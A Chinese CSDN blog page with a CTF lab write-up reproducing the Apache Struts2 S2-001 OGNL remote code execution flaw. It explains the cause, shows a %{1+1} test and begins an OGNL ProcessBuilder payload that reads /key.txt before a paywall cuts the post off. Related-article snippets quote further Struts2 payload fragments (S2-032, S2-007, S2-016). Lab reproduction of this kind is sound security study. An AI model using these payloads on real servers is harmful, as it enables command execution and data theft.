CTF-Apache Struts2远程代码执行漏洞(S2-001)复现

最新推荐文章于 2024-08-07 15:16:36 发布
最新推荐文章于 2024-08-07 15:16:36 发布
阅读量770 收藏
点赞数
分类专栏: 墨者学院
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/asd158923328/article/details/99935596
版权
本文介绍了Apache Struts2框架的一个远程代码执行漏洞(S2-001),该漏洞允许攻击者通过OGNL表达式执行恶意代码。当用户提交的数据在验证失败后被错误地重新填充,并使用OGNL解析时,攻击者可以利用此漏洞。文章展示了如何通过执行特定的OGNL表达式来触发漏洞,并尝试获取系统关键文件 `/key.txt` 的内容。
摘要由CSDN通过智能技术生成

根据题意
在这里插入图片描述
Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。
S2-001
原理:该漏洞其实是因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value}进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析。
试着直接执行%{1+1}
在这里插入图片描述
在这里插入图片描述
Exp命令执行直接get key
%{

#a=(new java.lang.ProcessBuilder(new java.lang.String[]{“cat”,"/key.txt"})).redirectErrorStream(true).start(),

#b=#a.getInputStream(),

#c=new java.io.InputStrea

最低0.47元/天 解锁文章
Jimmy22
关注
专栏目录
CTF-Apache Struts2远程代码执行漏洞(S2-037)复现
asd158923328的博客
08-22 1590
根据题意 漏洞概述:Apache Struts 2是世界上最流行的Java Web服务器框架之一。Apache Struts2在使用REST插件的情况下,攻击者使用REST调用恶意表达式可以远程执行代码。该漏洞编号为CVE-2016-4438,目前命名为S2-037。,黑客可以利用漏洞直接执行任意代码,绕过文件限制,上传文件,执行远程命令,控制服务器,直接盗取用户的所有资料,该漏洞广泛影响所有s...
Apache Struts2远程代码执行漏洞(S2-001)复现
qq_36933272的博客
09-01 835
根据参考链接,密码框输入%(1+1)验证是否存在S-2001漏洞,用户名任意 回显2,存在漏洞,网上寻找poc,ls查看根目录下的文件,发现key.txt%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{“ls”,"/"})).redirectErrorStream(true).start(), #b=#a.getInputStr...
Apache Struts 2框架漏洞
最新发布
qq_68186313的博客
08-07 229
漏洞产⽣于⽹站配置XML时如果没有设置namespace的值,并且上层动作配置并没有设置 或使⽤通配符namespace时,可能会导致远程代码执⾏漏洞的发⽣。2、在url处输⼊ http://192.168.56.134:8080/struts2- showcase/ ${(123+123)}/actionChain1.action 后刷新可以看到间数字位置相加了。1、访问IP:PORT/struts2-showcase。3、将上⾯验证payload的值修改为我们的利⽤exp。
ctfshow刷题 [struts2]
weixin_44807430的博客
01-08 756
纯粹且坚持
CTFshow刷题日记-WEB-JAVA(web279-300)Struts2漏洞复现,Java漏洞复现
热门推荐
Love&Share
10-12 1万+
全部题都是struts2框架漏洞 Struts2是用Java语言编写的一个基于MVC设计模式的Web应用框架 关于struts2漏洞,vulhub都有环境并且给出了漏洞原理和poc GitHub项目地址:https://github.com/vulhub/vulhub/tree/master/struts2 判断网站是否基于Struts2的方法链接 通过页面回显的错误消息来判断,页面不回显错误消息时则无效 通过网页后缀来判断,如.do .action,有可能不准 如果配置文件常数extension的值
buuctf [struts2]s2-046
qq_1873822的博客
03-19 372
漏洞描述 使用Jakarta插件,程序没有正确处理文件上传,通过构造HTTP请求头的Content-type造成RCE
CTF-Apache Struts2远程代码执行漏洞(S2-007)复现
asd158923328的博客
08-21 434
根据题意 形成原因:当配置了验证规则,类型转换出错时,进行了错误的字符串拼接,进而造成了OGNL语句的执行。 进入环境,查看源码, 限制了三个输入框的的值只能为text,而且长度在540以上, 然后在登录界面用户名和邮箱值随意,age部分改为我们的payload ’ + (#_memberAccess[“allowStaticMethodAccess”]=true,#foo=new java...
【Vulfocus解题复现Struts2 S2-013 Struts2 远程命令执行漏洞 (CVE-2013-1966)
温氏效应
09-04 2736
漏洞介绍 名称:Struts2 S2-013 远程命令执行漏洞 漏洞版本:Apache Group Struts 2.0.0 - 2.3.14 CVE标识符:CVE-2013-1966 描述:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL不包含任何参数(默认),get-仅在URL包含get参数,all-在URL同时包含get和post参数。当INCLUDEPa
Struts2-S2-061远程命令执行(CVE-2020-17530)漏洞复现
qq_57172130的博客
05-03 709
目录 框架介绍 漏洞原理 影响版本 环境搭建 漏洞探测 漏洞利用 防御措施 框架介绍 Apache Struts 2最初被称为WebWork 2,它是一个简洁的、可扩展的框架,可用于创建企业级Java web应用程序。Struts 2是Struts 1的一个升级版,但是它和Struts 1来相比,提供了太多的增强和改进,怎么运行的呢,就是实现了Servlet的功能,来进行控制页面跳转。同时这也是基于MVC设计模式的Web应用框架,Struts 2的控制功能就相当于MVC的Controll
CTF-Apache Struts2远程代码执行漏洞(S2-032)复现
asd158923328的博客
08-22 868
根据题意 漏洞原理:当启用动态方法调用时,可以传递可用于在服务器端执行任意代码的恶意表达式 任意命令执行Exp: %23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setChara...
python struct在CTF的使用
lhk124的博客
07-09 300
CTF,由于IDA反编译出来的结果主要以C语言的语法呈现(可换成其他语言),这会涉及int64之类的数据类型的说明,而求解flag通常使用的是python,这里边涉及到了对字节的转换。如何将C语言的字节用python表示?便可以使用该库,进行直接的转换。 ...
buuctf [struts2]s2-008
qq_1873822的博客
03-19 542
漏洞概述 主要是利用对传入参数没有严格限制,导致多个地方可以执行恶意代码 第一种情况其实就是S2-007,在异常处理时的OGNL执行 第二种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是java的webserver(Tomcat),对cookie的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋 第四种需要开启devModedebug模式。 https://www.freebuf.com/articles/web/25337.html POC devmode.acti
CTF题2
qq_41409656的博客
01-18 1202
题1:ipspoofing直接访问,查看源码都没发现什么把网页啦到最下面点击进入后发现是一个登陆界面,在登陆界面查看网页源码,发现用户名和面直接在网页登陆发提示IP不在范围内,通过Burp抓包登陆看看发现提示了一个127.0.0.1的IP,伪造一个IP看看,获得flag题2: phpinfo直接访问就是一个phpinfo()的放回信息,而且链接变成了 index.php?path=phpinfo.
Buuctf [struts2]s2-001
ch258563的博客
06-09 228
Buuctf [struts2]s2-001
Struts2漏洞分析与复现合集
未完成的歌~的博客
08-22 7365
原理:该漏洞因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行漏洞环境搭建 https://github.com/vulhub/vulhub/tree/master/struts2/s2-001 运行以下命令进行设置 .............
buuctf [struts2]s2-016
qq_1873822的博客
03-17 596
漏洞原理 DefaultActionMapper类支持以"action:"、“redirect:”、"redirectAction:"作为导航或是重定向前缀,但是这些前缀后面同时可以跟OGNL表达式,由于struts2没有对这些前缀做过滤,导致利用OGNL表达式调用java静态方法执行任意系统命令 https://blog.csdn.net/u011721501/article/details/41735885 任意命令执行 index.action?redirect:%24%7B%23context%5.
struts2系列-Real-BUUCTF平台
~airrudder~
04-24 3841
本篇内容 [PHP]XXE [ThinkPHP]5-Rce [ThinkPHP]5.0.23-Rce [ThinkPHP]2-Rce 上一篇 | 目录 | 下一篇 [PHP]XXE 打开就显示phpinfo,直接搜索flag就出来了。 不知道是不是环境坏了。 [ThinkPHP]5-Rce [ThinkPHP]5.0.23-Rce [ThinkPHP]2-Rce ...
buuctf [struts2]s2-045
qq_1873822的博客
03-16 678
漏洞介绍 Apache Struts 2被曝存在远程命令执行漏洞漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。 恶意用户可在上传文件时通过修改HTTP请求头的Content-Type值来触发该漏洞,进而执行系统命令。 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式Struts2作为控制器(Controller)来建立模型与视图的数据交互。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值